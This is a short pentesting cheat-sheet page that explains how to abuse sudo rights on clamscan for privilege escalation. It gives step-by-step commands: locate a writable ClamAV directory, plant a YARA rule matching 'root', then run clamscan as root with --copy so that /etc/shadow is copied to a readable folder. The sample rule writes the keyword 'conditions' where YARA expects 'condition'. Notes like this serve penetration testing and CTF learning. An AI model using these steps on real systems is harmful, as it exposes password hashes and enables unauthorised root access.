Sudo ClamAV Privilege Escalation

The sudo clamscan command might be vulnerable to privilege escalation (PrivEsc).

Investigation

If we can execute “clamscan” command as root as below,

sudo /usr/bin/clamscan /etc/shadow --copy=/tmp/results

we can read sensitive files by applying the custom yara rule.

Exploitation

1. Create a Yara Rule

First off, check the location in which the yara file can be created.

find / -name "clam*" 2>/dev/null

For instance, assume we can create the yara file under /var/lib/clamav/. Create the yara rule in there. Assume we want to read /etc/shadow, so specify the string “root” because the /etc/shadow contains “root” user name.

# /var/lib/clamav/test.yara
rule test
{
  strings:
    $string = "root"
  conditions:
    $string
}

2. Execute ClamScan

Now execute "clamscan" as root.

sudo /usr/bin/clamscan /etc/shadow --copy=/tmp/results

We can see /etc/shadow under /tmp/results.

PreviousSudo Privilege Escalation NextSudo Curl Privilege Escalation

Last updated 1 month ago

hashtagInvestigation

hashtagExploitation

hashtag1. Create a Yara Rule

hashtag2. Execute ClamScan

Investigation

Exploitation

1. Create a Yara Rule

2. Execute ClamScan